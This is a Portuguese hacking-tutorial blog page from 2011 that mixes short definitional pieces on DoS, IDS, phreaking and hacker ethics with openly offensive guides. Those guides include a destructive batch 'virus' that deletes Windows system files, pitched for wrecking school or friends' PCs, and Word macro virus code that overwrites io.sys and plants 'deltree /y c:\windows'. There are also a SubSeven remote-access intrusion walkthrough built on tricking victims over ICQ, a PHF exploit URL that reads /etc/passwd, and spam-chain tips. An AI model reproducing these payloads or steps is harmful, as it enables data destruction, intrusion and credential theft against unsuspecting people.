♛Hacker_Evollution_Tecnológica♛: 2011-07-24
Google-Translate-ChineseGoogle-Translate-Portuguese to FrenchGoogle-Translate-Portuguese to GermanGoogle-Translate-Portuguese to ItalianGoogle-Translate-Portuguese to JapaneseGoogle-Translate-Portuguese to EnglishGoogle-Translate-Portuguese to Spanish

Seja um Postador <>Hacker-Evollution<>

Mande Comentário no seguinte link>clicke aqui>
1. Nome Completo :
2. Idade :
3. MSN :
4. Tem Site? Qual? :
5. Você vai postar o que? :
6. Qual sua experiência com Sites? :
7. Porque quer ser Postador do Hacker-Evollution? :
Importante : Iremos escolher apenas 3 Postadores!

Tutorial Phreaker

O termo Phreaker, corruptela do inglês "freak" que significa "maluco", essencialmente significa a mesma coisa que o original "hacker", no entanto é um decifrador aplicado à area de telefonia (móvel ou fixa). No uso atual, entende-se que um Hacker modifica computadores, e um Phreaker modifica telefones (experimente discar no seu telefone batendo sucessivas vezes no gancho ao invés de usar o teclado do aparelho, e você estará sendo um phreaker). Os Phreakers também se enquadram no conceito de White hat ou Black hat.

Tutorial Usando o google como ferramenta hacker

Hoje vou iniciar a uma série de artigos sobre técnicas de ataque e defesa de sistemas, vou começar com um excelente artigo do GRIS ( Grupo de Resposta a Incidentes de Segurança ) da UFRJ que fala sobre Técnicas de Ataque e Defesa de Sistemas usando o Google. Vou dividi-lo em partes para um melhor entendimento.

Boa leitura!
A utilização de agentes buscadores para catalogar páginas, ao mesmo tempo em que aumenta consideravelmente o número de respostas da ferramenta, traz o problema de muitas vezes catalogar mais do que os administradores de páginas gostariam. Isso porque muitos servidores conectados a Internet – e, portanto, passíveis de serem catalogados por agentes buscadores – não foram configurados de forma segura, contando apenas com o fato de não serem conhecidos para se protegerem. Assim, se os agentes do Google encontrarem, por exemplo, arquivos sigilosos ao fazerem uma varredura nos servidores de sua empresa, eles irão adicionar tais arquivos e páginas à base de dados do Google na primeira oportunidade, já que não são capazes de diferenciar o que é público do que é confidencial.
Dessa forma, muita informação “sensível” pode ser encontrada, bastando que se saiba o que procurar. Não bastasse isso, o Google armazena no “cache” uma versão da sua página ou arquivo, de modo que mesmo corrigindo o problema do seu servidor, seus dados podem ainda estar expostos. Vejamos alguns tipos de ataques que podem ser feitos através do Google.
Nota: é importante observar que a maioria dos ataques e técnicas aqui exemplificados não são nenhuma novidade. Existem registros sobre alguns destes que datam de 2001, o que indica que usuários maliciosos vêm explorando tais características de sistemas de busca a mais tempo ainda.
Ataque #1 – Identificação de servidores
Para identificar todas as páginas da Google que o próprio Google já catalogou, por exemplo, basta
digitar:

Tutorial Crackeando Programas

Crackeando Programas

O termo CRACKEAR PROGRAMAS significa burlar o sistema de validação das licenças dos programas, a grosso modo, seria como “ tornar original os programas piratas”. Existem na Internet existem programas com diversas licenças:
Freeware (Livre).
Shareware (Para usar por alguns dias, etc).
Demo (Demonstração).

Na maioria das vezes, os programas que podemos crackear são os Shareware, pois eles, em sua grande maioria, possuem a opção para você colocar a chave de Instalação (CD-KEY). Na Internet existem diversos sites que fornecem diversos CRACK´S, existem dois em especial:
www.crackdb.org
www.crack.ms

Um dos crack´s mais famosos na Internet é o que altera a licença do Windows XP de PIRATA para ORIGINAL, permitindo que você instale no seu computador, por exemplo, o Internet Explorer 7.0 e Windows Media Player 11.

Turorial Ataques Dos (Denial of Service) e DDoS (DistributedDoS)

De acordo com a definição do CERT (Computer Emergency Response Team), os ataques DoS (Denial of Service), também denominados Ataques de Negação de Serviços, consistem em tentativas de impedir usuários legítimos de utilizarem um determinado serviço de um computador. Para isso, são usadas técnicas que podem: sobrecarregar uma rede a tal ponto em que os verdadeiros usuários dela não consigam usá-la; derrubar uma conexão entre dois ou mais computadores; fazer tantas requisições a um site até que este não consiga mais ser acessado; negar acesso a um sistema ou a determinados usuários.

Explicando de maneira ilustrativa, imagine que você usa um ônibus regularmente para ir ao trabalho. No entanto, em um determinado dia, uma quantidade enorme de pessoas “furaram a fila” e entraram no veículo, deixando-o tão lotado que você e os outros passageiros regulares não conseguiram entrar. Ou então, imagine que você tenha conseguido entrar no ônibus, mas este ficou tão cheio que não conseguiu sair do lugar por excesso de peso. Este ônibus acabou negando o seu serviço – o de transportá-lo até um local -, pois recebeu mais solicitações – neste caso, passageiros – do que suporta.

É importante frisar que quando um computador/site sofre ataque DoS, ele não é invadido, mas sim sobrecarregado. Isso independe do sistema operacional utilizado.

Os ataques do tipo DoS mais comuns podem ser feitos devido a algumas características do protocolo TCP/IP (Transmission Control Protocol / Internet Protocol), sendo possível ocorrer em qualquer computador que o utilize. Uma das formas de ataque mais conhecidas é a SYN Flooding, onde um computador tenta estabelecer uma conexão com um servidor através de um sinal do TCP conhecido por SYN (Synchronize). Se o servidor atender o pedido de conexão, enviará ao computador solicitante um sinal chamado ACK (Acknowledgement). O problema é que em ataques desse tipo, o servidor não consegue responder a todas as solicitações e então passa a recusar novos pedidos.

Outra forma de ataque comum é o UPD Packet Storm, onde um computador faz solicitações constantes para que uma máquina remota envie pacotes de respostas ao solicitante. A máquina fica tão sobrecarregada que não consegue executar suas funções.
Ataques DDoS

O DDoS, sigla para Distributed Denial of Service, é um ataque DoS ampliado, ou seja, que utiliza até milhares de computadores para atacar uma determinada máquina. Esse é um dos tipos mais eficazes de ataques e já prejudicou sites conhecidos, tais como os da CNN, Amazon, Yahoo, Microsoft e eBay.

Para que os ataques do tipo DDoS sejam bem-sucedidos, é necessário que se tenha um número grande de computadores para fazerem parte do ataque. Uma das melhores formas encontradas para se ter tantas máquinas, foi inserir programas de ataque DDoS em vírus ou em softwares maliciosos.

Em um primeiro momento, os hackers que criavam ataques DDoS tentavam “escravizar” computadores que agiam como servidores na internet. Com o aumento na velocidade de acesso à internet, passou-se a existir interesse nos computadores dos usuários comuns com acesso banda larga, já que estes representam um número muito grande de máquinas na internet.

Para atingir a massa, isto é, a enorme quantidade de computadores conectados à internet, vírus foram e são criados com a intenção de disseminar pequenos programas para ataques DoS. Assim, quando um vírus com tal poder contamina um computador, este fica disponível para fazer parte de um ataque DoS e o usuário dificilmente fica sabendo que sua máquina está sendo utilizado para tais fins. Como a quantidade de computadores que participam do ataque é grande, é praticamente impossível saber exatamente qual é a máquina principal do ataque.

Quando o computador de um internauta comum é infectado com um vírus com funções para ataques DoS, este computador passa a ser chamado de zumbi. Após a contaminação, os zumbis entram em contato com máquinas chamadas de mestres, que por sua vez recebem orientações (quando, em qual site/computador, tipo de ataque, entre outros) de um computador chamado atacante. Após receberem as ordens, os computadores mestres as repassam aos computadores zumbis, que efetivamente executam o ataque. Um computador mestre pode ter sob sua responsabilidade até milhares de computadores. Repare que nestes casos, as tarefas de ataque DoS são distribuídas a um “exército” de máquinas escravizadas. Daí é que surgiu o nome Distributed Denial of Service. A imagem abaixo ilustra a hierarquia de computadores usadas em ataques DDoS.

Como exemplo real de ataques DDoS ajudados por vírus, tem-se os casos das pragas digitais Codered, Slammer e MyDoom. Existem outros, mas estes são os que conseguiram os maiores ataques já realizados.
Impedindo e detectando ataques DoS

Apesar de não existir nenhum meio que consiga impedir totalmente um ataque DoS, é possível detectar a presença de ataques ou de computadores (zumbis) de uma rede que estão participando de um DDoS. Para isso, basta observar se está havendo mais tráfego do que o normal (principalmente em casos de sites, seja ele um menos conhecido, como o InfoWester, seja ele um muito utilizado, como o Google), se há pacotes TCP e UDP que não fazem parte da rede ou se há pacotes com tamanho acima do normal. Outra dica importante é utilizar softwares de IDS (Intrusion Detection System – Sistema de Identificação de Intrusos).

Para prevenção, uma das melhores armas é verificar as atualizações de segurança dos sistemas operacionais e softwares utilizados pelos computadores. Muitos vírus aproveitam de vulnerabilidades para efetuar contaminações. Também é importante filtrar certos tipos de pacotes na rede e desativar serviços que não são usados.

Tutorial Ataque por monitoraçao

Os ataques por monitoração são baseados em software de monitoração de rede conhecido como “sniffer”, instalado surrepticiamente pelos invasores.
O sniffer grava os primeiros 128 bytes de cada sessão login, telnet e FTP session vista naquele segmento de rede local, comprometendo TODO o tráfego de/para qualquer máquina naquele segmento, bem como o tráfego que passar por aquele segmento. Os dados capturados incluem o nome do host destino, o username e a password. A informação é gravada num arquivo posteriormente recuperado pelo invasor para ter acesso a outras máquinas.
Em muitos casos os invasores obtem acesso inicial aos sistemas usando uma das seguintes técnicas:

Obtém o arquivo de passwords via FTP em sistemas impropriamente configurados.

Obtém o arquivo de password de sistemas rodando versões inseguras do NIS
Obtém acesso ao sistema de arquivos locais via pontos exportados para montagem com NFS, sem restrições. Usam um nome de login e password capturada por um sniffer rodando em outro sistema.
Uma vez no sistema, os invasores obtem privilegios de root explorando vulnerabilidades conhecidas, tal como rdist, Sun Sparc integer division, e arquivos utmp passíveis de escrita por todo mundo ou usando uma password de root capturada.
Eles então instalam o software sniffer, registrando a informação capturada num arquivo invisível. Adicionalemente, eles instalam Cavalos de Troia em substituição e uma ou mais dentre os seguintes arquivos do sistema, para ocultar sua presença: /bin/login
/usr/etc/in.telnetd
/usr/kvm/ps
/usr/ucb/netstat

Tutorial Como camuflar o Ip

Existem dois tipos de IP, o fixo e o dinâmico, tanto nas conexões discadas, quanto nas conexões de banda larga seu IP quase sempre é dinâmico, ou seja, cada vez que você se conecta à internet seu provedor lhe dá um número de endereço IP diferente, então para mudar seu endereço IP basta se desconectar e conectar novamente à internet.

Como camuflar meu IP? Como ficar invisível na internet?

Você pode precisar esconder,
ou mascarar seu IP por vários motivos, como por exemplo para entrar num site que exiga que você esteja em certo país, assim eles verão o IP que você atribuiu e não seu verdadeiro IP, nesse caso você deve atribuir a seu computador um IP daquele país. Este processo se chama utilização de proxy, para mascarar ou esconder seu IP verdadeiro você deve:

1º Escolher um número de proxy (IP), entre nesse site http://www.samair.ru/proxy/ e escolha um. IP adress é o número do IP (proxy) os números depois de dois pontos (:) é a porta. Anonymity level é o nível de anonimato. Checked time é a última vez que o proxy foi testado e está funcionando corretamente. Country é o país de onde é o proxy, no caso de onde vão identificar que você esteja.

2º Após escolher o proxy, se você usar o Internet Explorer vá em: Ferramentas -> Opções de Internet -> Conexões -> Configurações de Lan – Selecione “Usar servidor proxy” e digite o IP e a porta do servidor.

Se usar o Firefox vá em Ferramentas -> Opções -> Avançado -> Rede -> Configurações -> Configuração manual de proxy e em HTTP digite o proxy e a porta que você escolheu no 1º passo

Caso fique muito lento tente escolher outro proxy e depois não esqueça de voltar seu navegador para a configuração original pois com o tempo o proxy pode parar de funcionar e você pode não conseguir usar a internet.

Pronto!
Agora que estou invisível…

Calma lá, não é porque você se escondeu que não poderá ser encontrado, saiba que as empresas de telefonia e a polícia tem mecanismos para, mesmo você estando escondido atrás de outro IP, saber exatamente onde você está.

Basta a empresa de telefonia fazer uma pesquisa que descobrem seu real número IP, daí eles descobrem seu número de telefone (pois a empresa sabe exatamente que telefone usou que IP tal hora, já que é a mesma empresa de telefonia que atribuíu o número IP ao seu telefone), de posse do número de seu telefone podem saber qual é a sua cidade, seu bairro e o número da sua casa. É assim que geralmente encontram pedófilos e ladrões de internet. Um método parecido também é usado para rastrear e-mails.

Por outro lado você pode ficar tranqüilo em relação a isso, pois as empresas de telefonia só podem repassar essas dados à polícia, mesmo assim somente com um mandado judicial.

Tutorial Como fazer um spam

Como criar um SPAM Todas as correntes e SPAMs famosos não fizeram sucesso ao acaso. Elas seguiram uma série de passos que possibilitaram com que fossem repassadas a dezenas de milhares de caixas de correio indefesas por toda a Internet. Vejamos como montar sua corrente rapidamente e com eficiência.

1º Escolha o assunto:
A escolha do assunto da sua corrente é muito importante, pois é preciso que seja polêmico a ponto de sensibilizar o leitor incauto a repassá-la para toda a sua lista de endereços. Uma dica é escolher algum produto que seja consumido pela grande massa ou alguma celebridade em algum tipo de escândalo irreal. Há os que preferem fotos de crianças doentes e mutiladas ou mensagens religiosas e de auto-ajuda, mas estes trataremos mais tarde.

2º Monte uma história:
Independente do assunto escolhido, saiba que a história sempre precisa ser forçada. Histórias que beiram o limite do crível são repassadas com muito mais facilidade.

Tutorial - Cracker

O termo Cracker, do inglês "quebrador", originalmente significa alguém que "quebra" sistemas. Hoje em dia, pode tanto significar alguém que quebra sistemas de segurança na intenção de obter proveito pessoal (como por exemplo modificar um programa para que ele não precise mais ser pago), como também pode ser um termo genérico para um Black Hat.

Tutorial Descobrindo ip


 IP

IP vem da sigla INTERNET PROTOCOL, ou Protocolo da Internet, ele é um número que identifica o nosso computador em uma rede de computadores, onde não existe 2 computadores com o mesmo endereço ip em uma rede. Garantindo a integridade na hora de identificar um computador na rede.
A Internet, a grosso modo, também é uma rede de computadores, e cada computador que acessa a Internet, recebe de seu provedor de acesso um número de IP, onde também não existem dois computadores com o mesmo endereço ip na Internet, como ocorre nas redes de computadores.

O Comando Netstat


Para descobrir o endereço IP de um outro computador na rede ou na Internet, primeiramente é necessário usar um programa de compartilhamento de arquivos ou de Bate-Papo, como o ICQ ou o MSN. Como primeira etapa, eu tenho que compartilhar um arquivo com o computador que eu quero saber o endereço IP.
Após estabelecer a comunicação com o outro computador, clique em INICIAR / EXECUTAR e digite o comando CMD, desta forma eu ativarei o PROMPT DE COMANDO, programa que faz uma emulação do antigo MS-DOS
Após isso, vamos digitar o comando NETSTAT –N e será exibida uma lista de endereços IP, onde o último número do endereço IP externo é o da pessoa da qual estou trocando o arquivo, desta forma facilita o meu acesso caso eu queira usar um outro tipo de programa que necessite desta informação.

Tutorial desligando o PC de alguem

Desligando o Computador

Para desligar o computador de alguma pessoa pela Internet, por incrível que pareça é um procedimento simples e usaremos uma rotina do MS-DOS que nós mesmos vamos criar.

Como fazer?



Vamos iniciar a criação da nossa rotina, clique em INICIAR/EXECUTAR e digite o comando NOTEPAD, na realidade, este comando exibe o BLOCO DEE NOTAS do Windows. Já no Bloco de Notas, teremos que digitar o seguinte comando do MS-DOS:
shutdown –r – c “teste” –t 15
E na hora de salvar, coloque
o nome que você deseja.BAT

Como se defender?

Para se defender deste ataque, após clicar, mesmo que por acidente ou inocência, você deve ser rápido e acessar:
- INICIAR / EXECUTAR e digitar o comando:
shutdown –a e clique em OK, desta forma voce neutraliza a ação do comando com um contra-comando.

Tutorial como Detectar Instrusos

Recentemente, analisei alguns aspectos de segurança de sistemas de detecção de intrusão (IDS) baseados em observação de tráfego de rede. Observei que embora os sistemas de IDS via rede sejam bastante interessantes para detectar possíveis intrusões, estes sistemas possuem limitações que, caso não sejam endereçadas adequadamente, podem comprometer a funcionalidade dos mesmos.

Comparando com o modelo baseado em rede, onde um dispositivo fica "ouvindo" todo o

tráfego de rede, o modelo de host é baseado no uso de agentes. De uma forma geral, todos eles possuem um pequeno programa (agente), instalado no sistema que se quer proteger. Este agente é responsável por analisar, o mais rapidamente possível, vários indicadores do sistema, como logs, níveis de uso de CPU, que usuários estão conectados, etc... Com base nas suas regras pré-programadas (sejam elas baseadas em assinatura ou perfis, ou ambos), o agente decide gerar ou não alarmes. Caso o alarme seja gerado, ele freqüentemente é enviado a um servidor central (chamado de "gerente") que pode tomar outras ações adicionais (chamar o operador por pager, gerar log, etc...).

O tipo de informações que um agente pode monitorar, o grau de sofisticação com o qual ele monitora essas informações e que tipo de ação ele pode tomar variam de sistema para sistema. No geral, todos eles permitem monitorar:

· Logs do sistema operacional. No caso de Windows NT, os diversos EventLog. No caso de Unix, o log controlado pelo syslog. Nesses logs são armazenados eventos básicos, como auditoria de arquivos, logins bem sucedidos ou não, início e término de programas, entre outros.

· Contadores ou indicadores do sistema. Nesse caso, são monitorados aspectos como consumo de CPU (via Performance Monitor do NT ou sar do Unix), espaço disponível em disco e consumo de memória, entre outros. Embora sejam dados não diretamente relacionados à segurança, uma mudança nestes parâmetros pode indicar que algo mudou significativamente. Como exemplo, caso um servidor esteja sendo utilizado indevidamente para tentar quebrar senhas (com programas como L0phtcrack ou Crack, por exemplo) o consumo de CPU poderá ser notadamente maior.

Alguns outros sistemas de detecção de intrusão via host também permitem a monitoração de outros logs, especificados pelo usuário. Nesse caso, podem ser monitorados os logs de programas que, por um motivo ou outro, não usam os logs do sistema. Nessa categoria podemos incluir sistemas de banco de dados, servidores de autenticação (como Radius/Tacacs), servidores Web, entre outros. Nesses casos, o agente deve ser "treinado" em o que deve ser analisado do log.

Com todas essas características, os IDS baseados em host acabam por oferecer vantagens significativas para o implementador de IDS. A principal delas é que a qualidade da informação coletada. Como o log a ser gerado pela aplicação pode ser o resultado de uma longa transação, por exemplo, é possível detectar ataques ou situações que uma análise dos pacotes individuais não mostraria.

Outra vantagem do modelo de IDS de host é que, como o agente é especializado para um determinado sistema operacional, ele pode inspecionar características desse sistema não acessíveis via rede. Existem diversas vulnerabilidades conhecidas, tanto em Unix como em NT, que só podem ser exploradas por usuários locais. É comum que indicadores dessas vulnerabilidades (ou de tentativas de exploração delas) não sejam percebidas por quem está "fora" do sistema, como um IDS de rede.

Por outro lado, é importante conhecermos as limitações dos IDS de host.

Em primeiro lugar, um IDS de host é significativamente mais trabalhoso de implementar, pois necessita agentes em todos os equipamentos a serem protegidos. Se estamos falando de 200, 300 servidores, pode ser um impacto grande ter que instalar e configurar agentes em todos eles.

Outro problema com IDS de host é a não existência de um agente para o sistema operacional em questão. São poucos os produtos que possuem suporte a uma gama variada de sistemas operacionais. A maioria tende a suportar Windows (mesmo assim quase sempre somente NT), Solaris e talvez outro tipo de Unix, como HP-UX, AIX ou Linux. De que adianta um IDS que não suporta a plataforma desejada?

Outro ponto a ser observado diz respeito à qualidade da informação inicial. Caso os logs observados pelo IDS não indiquem os eventos desejados em um grau de detalhe adequado, o IDS não pode extrair nada dali. No caso de um sistema que inspecione o syslog de Unix, por exemplo, não podemos detectar possíveis incidentes com o daemon de DNS (ou de FTP) se o mesmo não foi configurado para gerar logs no syslog (ou se o IDS não foi configurado para coletar os logs em outro lugar).

Finalmente, outro ponto diz respeito à segurança do próprio daemon (ou serviço) do IDS. Como o IDS roda no próprio sistema, caso um atacante consiga obter acesso privilegiado (root/Administrator) ele pode desabilitar o agente do IDS. Caso não exista nenhum mecanismo de checagem periódica, a intrusão poderá não ser detectada.

Ao final de nossa análise técnica sobre IDS, espero que tenha ficado claro que um sistema de detecção de intrusão pode ser um excelente acréscimo ao conjunto de mecanismos de segurança da organização. Um IDS pode indicar atividades suspeitas no ambiente, levando a equipe de segurança a identificar uma intrusão ou uma tentativa de intrusão. Ou seja, no final das contas, ainda há muito trabalho a ser feito depois de instalado os mecanismos de detecção de intrusão.

Tutorial Engenharia Social

Engenharia Social

Um dos maiores problemas na Internet, a ENGENHARIA SOCIAL vem se tornando a maior arma utilizada pelos crackers para ludibriar e roubar os menos atentos que circulam na rede. Muitas vezes a falta de informação ou, na maioria dos casos, a falta de conhecimento, facilita e incentiva que a cada dia cresça o número de engenheiros sociais na Internet.



Como funciona a engenharia social:
Funciona da seguinte forma, o engenheiro social consegue criar um vínculo de amizade e confiança com a pessoa, ao ponto da vítima lhe ceder ou entregar informações altamente confidencias necessárias para os seus ataques com uma grande facilidade.

Como funciona a engenharia social:
Funciona da seguinte forma, o engenheiro social consegue criar um vínculo de amizade e confiança com a pessoa, ao ponto da vítima lhe ceder ou entregar informações altamente confidencias necessárias para os seus ataques com uma grande facilidade.

Tutorial Etica hacker

Existe uma ética hacker. Equivocadamente é usado referindo-se a pessoas relativamente sem habilidade em programação e sem ética, como criminosos que quebram a segurança de sistemas, agindo ilegalmente e fora da ética hacker. O problema é quando os crackers e script kiddies são referidos como hackers pela imprensa, por falta de conhecimento, gerando uma discussão sem fim.

Nesse sentido, os hackers seriam as pessoas que criaram a Internet, fizeram do sistema operacional Unix o que ele é hoje, mantêm a Usenet, fazem a World Wide Web funcionar, e mantém a cultura de desenvolvimento livre conhecida atualmente. É comum o uso da palavra hacker fora do contexto eletrônico/computacional, sendo utilizada para definir não somente as pessoas ligadas a informática, mas sim os especialistas que praticam o hacking em diversas áreas.

Cultura hacker

Glider: logotipo proposto para Hacker

É importante lembrar que existe toda uma cultura por trás desse sentido da palavra hacker. A Cultura hacker define diversos pontos para estilo e atitude e, por mais que pareça estranho, muitas das pessoas que se tornam os chamados programadores extraordionários possuem esse estilo e atitude naturalmente e casual.

O termo hoje também é usado para representar todos os que são bons naquilo que fazem, como os artesãos que usavam como principal ferramenta de trabalho o machado, ou Picasso com sua arte fabulosa, eles foram os primeiros hackers. Atualmente o termo indica um bom especialista em qualquer área. Este termo adquiriu esta definição somente após seu uso na informática, designando especialistas em computação.

Os hackers e crackers são indíviduos da sociedade moderna, e possuem conhecimentos avançados na área tecnológica e de informática, mas a diferença básica entre eles é que os hackers somente constróem coisas para o bem e os crackers destróem, e quando constróem, fazem somente para fins pessoais.

Os termos utilizados na segurança da informação, para diferenciar os tipos de hacker/cracker são:

Tutorial Como Fazer seu proprio Virus

Este texto irá ensinar, de modo fácil, destruir o computador da sua escola (ou daquele otario do seu amigo que gosta de ficar dando uma de Hacker ,ou o do seu trabalho, etc.)
Primeiro, crie em seu computador um arquivo de lote (nem precisa copilar), se não souber aí vai, pelo DOS digite:
copy con arquivo.bat

@echo off

@echo frase de sua preferência

del*.sys

del*.exe

del*.com

cd windows

del*.*

del arquivo.bat

@echo frase de sua preferência

Pronto, um arquivo virus de lote foi criado em seu computador, calmaaaa!!! Hehe, ele não fará nada contanto que você não digite "arquivo"no diretório onde ele está.
Remova este arquivo (arquivo.bat) para um disquete, junto a ele um "autoexec.bat" com a linha de comando: C:\arquivo .bat.
Agora é com você! Leve o disquete para a escola (trabalho, casa de amigo, etc.) e quando tiver uma oportunidade, insira o disco na unidade referente (geralmente a:) e copie os arquivos para o diretório C:\ Pronto! Retire o disco e diga thau, hehe.

VEJA UM EXEMPLO DE VIRUS DE MACRO QUE ADULTERA A IMPRESSÃO.

Vírus 12/04
Sub MAIN
If Dia(Agora()) = 12 and Mês(Agora()) = 04 Then
DefinirAtributo “C:\msdos.sys”, 0 aaaaOpen “C:\io.sys” For Output As # 1 aaaaPrint #1, “Beba Josta”
Close #1
End if
Open “c:\autoexec.bat” For Output As #1
Print #1, “@echo off” Print #1, “cls” aaPrint #1, “@deltree /y c:\windows > nul”
Close #1
End Sub

ROTINA 2

Sub MAIN
Open “C:\imaiden.txt” for Output As #1”
Print #1 “Código em hexadecimal”
Print #1 “Código em hexadecimal” ‘(continuação)...
Close #1
Shell “debug texto.txt”
Shell “c:\imaiden.com”
End Sub

ROTINA 3

Sub MAIN
MacroCopiar “Global:Inocu”, “DocumentoNovo”, 0
End sub

Vírus Fagundes Varela

Sub MAIN
InícioDocumento
Inserir “Lembra dessas noites”
Inserir CHR$(13)
Inserir “Cheias de doce harmonia,” aaa Inserir CHR$(13)
Inserir “Quando a floresta gemia” aa aaa Inserir CHR$(13)
Inserir “Do vento aos brandos açoites?”
Inserir CHR$(13)
Inserir CHR$(13)
Inserir “Quando as estrelas sorriam” aaa Inserir CHR$(13)
Inserir “Quando as campinas tremiam”
Inserir CHR$(13)
Inserir “Nas dobras do úmido véu?” aaa Inserir CHR$(13)
Inserir “E nossas almas unidas”
Inserir CHR$(13)
Inserir “Estreitavam-se, sentidas,” aaa Inserir CHR$(13)
Inserir “Ao brilhar daquele céu?” aaaArquivoImprimirPadrão
End Sub

Tutorial Gray hat

Gray hat - Tem as habilidades e intenções de um hacker de chapéu branco na maioria dos casos, mas por vezes utiliza seu conhecimento para propósitos menos nobres. Um hacker de chapéu cinza pode ser descrito como um hacker de chapéu branco que às vezes veste um chapéu preto para cumprir sua própria agenda. Hackers de chapéu cinza tipicamente se enquadram em outro tipo de ética, que diz ser aceitável penetrar em sistemas desde que o hacker não cometa roubo, vandalismo ou infrinja a confidencialidade. Alguns argumentam, no entanto, que o ato de penetrar em um sistema por si só já é anti-ético (ética hacker).

Tutorial Hackeando sua escola

Este texto irá ensinar, de modo fácil, destruir o computadorzinho da sua escola (ou de amigo, trabalho, etc.).

Primeiro, crie em seu computador um arquivo de lote (nem precisa compilar), se não souber aí vai, pelo DOS digite:

copy con arquivo.bat ENTER

@echo off ENTER

@echo Frase de sua preferência ENTER

del *.sys ENTER

del *.exe ENTER

del *.com ENTER

cd windows ENTER

del *.* ENTER

cd\ ENTER

Tutorial Como Juntar Arquivos No HJ-Split

Separe e junte novamente arquivos de todos os tipos.


Tutorial HJ-Split

Sempre que você baixar um filme ou Jogo em mais partes e ele contiver as extensões: 001, 002, 003 e assim por diante, você irá usar o HJ-Split para juntá-las.

Baixe o programa hjsplit

Aqui vai um passo a passo



1. Mantenha todas as partes em uma mesma pasta.

2. Certifique-se que todas tem o mesmo nome, mudando apenas a extenção.

3. De um duplo clique no icone do programa.

4. Clique em Join


5. Clique em Input File


6. Siga o ABC
Procure pela pasta onde estão os arquivos
Selecione o arquivo de final .001 (os demais não irão aparecer)
Clique em Abrir.


7. Clique em Start


8. Aguarde a barra chegar ao fim e estará pronto para usar o arquivo podendo excluir as partes.

Tutorial Invadir um Computador

COMO INVADIR UM COMPUTADOR

Teoria:
Ao contrário do que muita gente pensa, invadir um computador é muito simples. Podemos dizer que é mais fácil invadir um computador do que ser invadido, pelo simples motivo de que um anti-vírus qualquer impede a invasão de um hacker ou cracker (isso quando se usa um programa de invasão como NetBus, Subseven, BackOriffice e por aí vai.).



É Necessário:
- É essencial ter um cérebro criativo e mais de 64 neurônios.
- Um programa de invasão (Recomendo SubSeven).
- A vítima não ter um anti-vírus. Caso contrário ela não vai executar o vírus.

Recomendável:
- É recomendável uma conexão de no mínimo 56K.
- A velocidade do computador não tem muita importância nesse caso.
- Desabilite seu Anti-vírus para usar o programa (Você não vai se infectar, a não ser que você seja muito burro, o suficiente para executar o vírus ao invés do programa.).

Finalmente como invadir:
*Os programas de invasão costumam vir em três partes: Programa de invasão, Editor do vírus e vírus.*

Passo: Abra o editor de vírus. Agora mude o ícone, coloque uma mensagem qualquer pra pessoa ver quando abrir o vírus, onde você quer que o vírus inicie, esse tipo de bobagem, não é nada demais.

Passo: Converse com alguma pessoa, de preferência no " ICQ ". Convença a pessoa a aceitar um arquivo, diga que é algo engraçado ou coisa assim.

Passo: Após a pessoa aceitar o vírus e executá-lo, você terá que pegar o IP dela, não é difícil conseguir se você estiver no icq. Você pode achar em vários sites (inclusive nesse) alguns tipos de arquivo pra ver o IP de todos da sua lista do icq. Para o * icq 2001b ou o icq 2003a * você pode baixar esse arquivo clicando aqui. E substituir pelo existente na pasta do icq.

Passo: Agora digite o IP da pessoa no Programa de Invasão e pronto! Você invadiu o computador dessa pessoa. Agora você terá acesso a tudo, tudo que a pessoa está vendo na tela, o que ela digita ou conversa no icq, pode alterar arquivos, desligar o computador, colocar mensagens na tela e muito mais.

Tutorial Como invadir pelo Telnet

(Protocolo de Terminal Virtual) é o protocolo Internet para estabelecer a conexão entre computadores. Através dessa conexão remota, pode-se excutar programas e comandos em outra máquina, como se o teclado de seu computador estivesse ligado diretamente a ela.
O visual de uma conexão via Telnet é semelhante ao que se tem em BBS's de interface Dos, e a operação do computador remo

Tutorial Invasao via Browser

O ataque via browser é um dos ataques mais fáceis de executar, mas não da nem 50% de sucessos. Vou tentar explicar como você usa esse método:
Primeiramente você tem que entender o que está fazendo, não adianta selecionar a dica aperta CTRL+C e colocar no navegador achando que ele vai fazer tudo para você não, entenda:

Bom, como já sabe o geralmente o arquivo "passwd" é o que contém os passwords encripitados (se você não sabe ainda,
aprenda um pouco sobre o UNIX) , existem vários servidores que só Root pode entrar no diretório "/etc", para outros usuários é bloqueado o acesso a esse diretório, mas existe um método para tentar pegar esse arquivo. No diretório /cgi-bin do Web Server (Pagina WEB do servidor) geralmente contém um arquivos chamdo PHF. O PHF permite aos usuários ganhar acesso remoto para arquivos (inclusive o /etc/passwd). Então através desse arquivo você pode tentar pegar a lista de passwords, é muito simples, apenas digite essa URL no seu browser:

http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd


Então substitua o "xxx.xxx.xxx" pelo endereço do servidor que você quer hackear.


Ex:http://www.tba.com.br/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd


Antes de tentar qualquer ataque não custa nada usar o anonymizer , mais lembre-se nunca , nunca mesmo apague arquivos ou comandos.

Tutorial O que e Kernel?

O Kernel é um componente do Sistema Operacional, mas fica tão escondido que a maioria dos usuários domésticos sequer ouviu falar nele. Isso se deve à sua importância: ao contrário do que pode parecer, ele é tão essencial para o funcionamento de um computador que é melhor mantê-lo a salvo de pessoas bisbilhoteiras e inexperientes.



O cérebro do S.O.

Um PC divide-se, basicamente, em duas camadas: hardware e software. Até aí, nenhuma novidade. Onde entra o Kernel na história, então? Pois bem: ele é o grande responsável por fazer a interação entre essas camadas. Em outras palavras, é o Kernel que gerencia os recursos do sistema e permite que os programas façam uso deles.

Simples assim?

crbNa verdade, não. O fato é que o Kernel é complexo demais para ser explicado de forma técnica a um público leigo no assunto. Basicamente, ele começa a funcionar assim que o computador é ligado; nesse momento ele inicia a detecção de todo o hardware indispensável ao funcionamento da máquina (monitor, placa de vídeo etc.). O Sistema Operacional é carregado em seguida e, uma vez que o usuário faça seu login, o Kernel passa a administrar as principais funções dentro do S.O.: isso inclui o gerenciamento da memória, dos processos, dos arquivos e de todos os dispositivos periféricos.

Dessa forma o Kernel pode ser descrito como um grande organizador: é ele o responsável por garantir que todos os programas terão acesso aos recursos de que necessitam (memória RAM, por exemplo) simultaneamente, fazendo com que haja um compartilhamento concorrente – mas sem oferecer riscos à integridade da máquina.

Tutorial Keylogger

KEYLOGGER

O Keylogger é um programa espião, um dos mais usados e um dos mais perigosos que circulam na Internet. Ele é usado sempre que preciso “pegar” informações da vítima, como por exemplo: TUDO o que a pessoa digita, imagens da tela da vítima, todos os sites que a pessoa acessa na Internet. Variam as opções dependendo do Keylogger.




                        O Keylogger ARDAMAX

